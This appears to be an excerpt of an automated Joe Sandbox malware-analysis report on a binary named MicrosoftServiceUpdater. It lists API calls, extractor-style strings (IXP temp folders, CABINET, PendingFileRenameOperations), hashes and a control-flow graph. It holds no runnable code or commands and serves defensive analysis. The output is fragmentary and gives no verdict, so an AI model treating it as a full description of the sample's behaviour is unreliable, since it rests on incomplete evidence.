                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 976364251-3916222277
                                                                                                                                                                                          • Opcode ID: 16e7ca118e12b91407658261034ebca13a8d1872c09417475df138d405b27805
                                                                                                                                                                                          • Instruction ID: 8605413f97e1106ab4657307f5ad8d4001e4961820ee74c93ed26011eac54cc3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 16e7ca118e12b91407658261034ebca13a8d1872c09417475df138d405b27805
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA519F3291CA8286F7628B10E854B79F7A0FB89755F046134EA4D827A5CFFFD444EB10

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                                                                                                                                                                                          • String ID: IXP$IXP%03d.TMP
                                                                                                                                                                                          • API String ID: 4001122843-3932986939
                                                                                                                                                                                          • Opcode ID: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                                                                                                                          • Instruction ID: 7c238aec8b515b02b38beed0709246e86e9c8da3e433dbfdb7e01c428a6d9148
                                                                                                                                                                                          • Opcode Fuzzy Hash: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: BA317031708A8186FB129F12A950AB9FBA1FB8EB80F45A131DE4E83795CF7FD445D600

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 697 7ff636348460-7ff6363484a9 call 7ff636348bf4 GetStartupInfoW 701 7ff6363484ab-7ff6363484b6 697->701 702 7ff6363484b8-7ff6363484bb 701->702 703 7ff6363484c2-7ff6363484cb 701->703 704 7ff6363484da-7ff6363484e5 Sleep 702->704 705 7ff6363484bd 702->705 706 7ff6363484cd-7ff6363484d5 _amsg_exit 703->706 707 7ff6363484e7-7ff6363484ef 703->707 704->701 705->703 708 7ff63634855e-7ff636348567 706->708 709 7ff636348554 707->709 710 7ff6363484f1-7ff63634850e 707->710 711 7ff636348586-7ff636348588 708->711 712 7ff636348569-7ff63634857c _initterm 708->712 709->708 713 7ff636348512-7ff636348515 710->713 714 7ff63634858a-7ff63634858c 711->714 715 7ff636348593-7ff63634859b 711->715 712->711 716 7ff636348546-7ff636348548 713->716 717 7ff636348517-7ff636348519 713->717 714->715 720 7ff63634859d-7ff6363485ab call 7ff636348b60 715->720 721 7ff6363485d1-7ff6363485e0 715->721 716->708 718 7ff63634854a-7ff63634854f 716->718 717->718 719 7ff63634851b-7ff63634851f 717->719 725 7ff6363486bb-7ff6363486d0 718->725 722 7ff63634853b-7ff636348544 719->722 723 7ff636348521-7ff636348537 719->723 720->721 733 7ff6363485ad-7ff6363485c7 720->733 726 7ff6363485e4-7ff6363485ea 721->726 722->713 723->722 728 7ff6363485ec-7ff6363485ee 726->728 729 7ff63634865d-7ff636348660 726->729 734 7ff6363485f4-7ff6363485f9 728->734 735 7ff6363485f0-7ff6363485f2 728->735 730 7ff636348662-7ff63634866b 729->730 731 7ff63634866f-7ff636348677 _ismbblead 729->731 730->731 736 7ff636348679-7ff63634867c 731->736 737 7ff636348681-7ff636348689 731->737 733->721 738 7ff6363485fb-7ff636348605 734->738 739 7ff636348607-7ff63634863c call 7ff636342d70 734->739 735->729 735->734 736->737 737->725 737->726 738->734 742 7ff636348646-7ff63634864d 739->742 743 7ff63634863e-7ff636348640 exit 739->743 744 7ff63634865b 742->744 745 7ff63634864f-7ff636348655 _cexit 742->745 743->742 744->725 745->744
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2995914023-0
                                                                                                                                                                                          • Opcode ID: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                                                                                                                          • Instruction ID: 68a32716da0f445b30c961e976e52e3cfb488e74d47df29a0368fc3064999903
                                                                                                                                                                                          • Opcode Fuzzy Hash: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0613A31A1CA0686F7629B21E850B79A3A4FF45794F542035DA4EC73A0DFBFE841E640
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345220
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: SizeofResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345231
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345257
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LoadResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345268
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LockResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345277
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: memcpy_s.MSVCRT ref: 00007FF636345296
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FreeResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF6363452A5
                                                                                                                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF63634324B), ref: 00007FF6363462B9
                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF636346332
                                                                                                                                                                                            • Part of subcall function 00007FF636344F2C: LoadStringA.USER32 ref: 00007FF636344FBC
                                                                                                                                                                                            • Part of subcall function 00007FF636344F2C: MessageBoxA.USER32 ref: 00007FF636344FFC
                                                                                                                                                                                            • Part of subcall function 00007FF636347958: GetLastError.KERNEL32 ref: 00007FF63634795C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                          • String ID: $<None>$UPROMPT
                                                                                                                                                                                          • API String ID: 957408736-2569542085
                                                                                                                                                                                          • Opcode ID: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                                                                                                                          • Instruction ID: 79a4b645d3676f1db7199714321714119a3552d07e094565a435c87dfd450e5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9316372A0C24287F7225F21A950B7AFB60FF86785F40A135DA4D82795DFBFD404AB00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile$lstrcmp
                                                                                                                                                                                          • String ID: *MEMCAB
                                                                                                                                                                                          • API String ID: 1301100335-3211172518
                                                                                                                                                                                          • Opcode ID: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                                                                                                                          • Instruction ID: 65420f5742c222292396285e58d11c7a3defb4e99dcbb0b76ae9f37f85ac2974
                                                                                                                                                                                          • Opcode Fuzzy Hash: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                                                                                                                          • Instruction Fuzzy Hash: E961C562E0C78186F7628B15A484B79BB91FF45BB4F14A331CA6D827D0CFBFA405A600
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$AttributesDateItemLocalText
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                          • API String ID: 851750970-884561453
                                                                                                                                                                                          • Opcode ID: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                                                                                                                          • Instruction ID: a4ff7ec44b87dfaa5608b7e8f2c39f92db263582e47feeba93ae684fdbeaead3
                                                                                                                                                                                          • Opcode Fuzzy Hash: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC516F32E18A4681FA629F21D4409B9F3A0FF44B64F446232DA5E837D4DEBFE945E740
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocLocal
                                                                                                                                                                                          • String ID: TMP4351$.TMP
                                                                                                                                                                                          • API String ID: 3494564517-2619824408
                                                                                                                                                                                          • Opcode ID: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                                                                                                                          • Instruction ID: 3b416da897e4b360dca345d216c9735e14a376fe06e63d8ad558818ad85ec514
                                                                                                                                                                                          • Opcode Fuzzy Hash: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6841D232A0868186FB524F20E9107B9FB90EB86BA4F586334CA6D837D0CFBFD4519700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                                                                                                                                                                                          • API String ID: 3677997916-3057196482
                                                                                                                                                                                          • Opcode ID: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                                                                                                                          • Instruction ID: 73cc44d20189ab3a882c3efcbc2385a61a42d939d9ce13caaa59ccd8a373b521
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC118E32A0CB4287F7119B14E450A7AF7A4FB89390F402135DB9E83B98CFBFD444AA04
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF636343C80: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF636343B49), ref: 00007FF636343CA4
                                                                                                                                                                                            • Part of subcall function 00007FF636343C80: PeekMessageA.USER32 ref: 00007FF636343CC9
                                                                                                                                                                                            • Part of subcall function 00007FF636343C80: PeekMessageA.USER32 ref: 00007FF636343D0D
                                                                                                                                                                                          • WriteFile.KERNELBASE ref: 00007FF636345924
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1084409-0
                                                                                                                                                                                          • Opcode ID: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                                                                                                                          • Instruction ID: 170f67fd06d95d80170ac849206ace9ac1f37efa5cfe9c3a0b8d67ec51dc5531
                                                                                                                                                                                          • Opcode Fuzzy Hash: df09df05b6a8f76d98ff4e568d39aff5741097c23a6c3239c69c04500cd56e3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB218E61A0854286FB128F16E444B35E7A1FF85BA4F14A234D95C8B7E4CFBFD405DB00
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2018477427-0
                                                                                                                                                                                          • Opcode ID: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                                                                                                                          • Instruction ID: 67a5e03c73ca883f3b7b72ba1100e8af0a10f95ac6c491b98b75dfd6b6489e17
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4017b6c058a6be902cddc169abc6d9dcaedc57a8715b21c16ee5d7d8bc7a3f89
                                                                                                                                                                                          • Instruction Fuzzy Hash: E1117031E0C64682F7528F10E444B74E6A0FF467A9F146134CA4D8ABA1CFFFE495D200
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharPrev
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 122130370-0
                                                                                                                                                                                          • Opcode ID: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                                                                                                                          • Instruction ID: 2e74b37f61077754c3031532bd8cbb875f66b4459a30ccccc45d5ce5824f7004
                                                                                                                                                                                          • Opcode Fuzzy Hash: f69c92ee4560cd4f0bb57aa589b20250cdd633262219f505effccc195a14fdcf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1201841190C6C1C6F7624B15A4846ADFAA0A745BA0F987370DB69477D6CFBFD8829700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                          • Opcode ID: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                                                                                                                          • Instruction ID: 74fe076c3fcc51d1ceaa1406c0376eed28858efde122d3c66c042ff161e6dfb4
                                                                                                                                                                                          • Opcode Fuzzy Hash: c7d790a02c12fb3e5c56208d3f056b28bd5316e6bc6357f0cdb18446cbb40734
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F01D32A186C292FB194F25F581578B6A0EF48B68F145235DA2B877D4CEBAD481D710
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                                                                                          • String ID: $C:\Users\user\AppData\Local\Temp\IXP001.TMP\$one
                                                                                                                                                                                          • API String ID: 3530494346-2924011318
                                                                                                                                                                                          • Opcode ID: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                                                                                                                                                                                          • Instruction ID: a57f37ca8dd19caa3b90b082d099568015ecdff06a258045ac25decd0c867a39
                                                                                                                                                                                          • Opcode Fuzzy Hash: ccd9306e1016298e6bebe3b198e952bf491475324bfa792ea5420485550b1857
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B718261E0C68286F7528B22A440B79EB91EF85B91F94A130CA5EC37D5CFBFE445A701
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345220
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: SizeofResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345231
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FindResourceA.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345257
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LoadResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345268
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: LockResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF636345277
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: memcpy_s.MSVCRT ref: 00007FF636345296
                                                                                                                                                                                            • Part of subcall function 00007FF6363451F8: FreeResource.KERNEL32(?,?,00000000,00007FF636342F6B), ref: 00007FF6363452A5
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF636343432), ref: 00007FF636345FB0
                                                                                                                                                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF636343432), ref: 00007FF636345FC1
                                                                                                                                                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF636343432), ref: 00007FF636345FD0
                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00007FF636345FFD
                                                                                                                                                                                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF636343432), ref: 00007FF63634600E
                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00007FF636346026
                                                                                                                                                                                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF636343432), ref: 00007FF63634603A
                                                                                                                                                                                          • FreeResource.KERNEL32 ref: 00007FF636346151
                                                                                                                                                                                          • SendMessageA.USER32 ref: 00007FF6363461B3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                          • String ID: CABINET
                                                                                                                                                                                          • API String ID: 1305606123-1940454314
